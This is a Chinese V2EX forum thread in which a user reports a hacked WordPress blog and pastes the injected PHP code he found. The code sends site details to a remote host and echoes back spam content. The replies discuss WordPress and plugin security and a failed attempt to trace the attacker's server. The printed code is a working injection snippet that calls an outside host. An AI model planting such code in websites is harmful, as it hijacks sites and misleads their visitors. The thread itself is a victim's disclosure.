V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Wysten
V2EX  ›  程序员

wordpress 被黑

  •  
  •   Wysten ·
    Wysten-Hgg · 2017-07-31 09:53:04 +08:00 · 2610 次点击
    这是一个创建于 2673 天前的主题,其中的信息可能已经有所发展或是发生改变。

    自己有个网站一直没用,上面挂的是 wordpress 博客,今天上去一看被黑了。

    set_time_limit(0);
    
    header("Content-Type: text/html;charset=gb2312");
    date_default_timezone_set('PRC');
    $Remote_server = "http://www.028blue.com/xmbt/"; 
    $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    $Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
    
    echo $Content_mb;
    
    

    内容是随机的,刷新一次换一个样,不忍直视。。

    5 条回复    2017-07-31 12:29:44 +08:00
    Mutoo
        1
    Mutoo  
       2017-07-31 10:05:50 +08:00
    开启自动升级,不然出漏洞没更新很容易被拿下。
    msputup
        2
    msputup  
       2017-07-31 10:09:44 +08:00
    wordpress 是最好黑的博客,没有之一。
    operafans
        3
    operafans  
       2017-07-31 11:12:19 +08:00
    @msputup #2 wp 现在安全做的还可以吧 主要是插件坑太多
    ivmm
        4
    ivmm  
       2017-07-31 11:31:51 +08:00
    @msputup 不乱下盗版主题、插件,个人觉得没有比 WP 更安全的 PHP 博客了
    scofieldpeng
        5
    scofieldpeng  
       2017-07-31 12:29:44 +08:00
    看了下 028blue.com 这个,试着按着这个代码想看看,结果打不开,host 了一下,ip 是 122.10.93.116,坐标香港,cloudie.hk 的机器,然后顺便想扫描下的,结果主机貌似下线了,可惜
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   883 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 20:36 · PVG 04:36 · LAX 12:36 · JFK 15:36
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.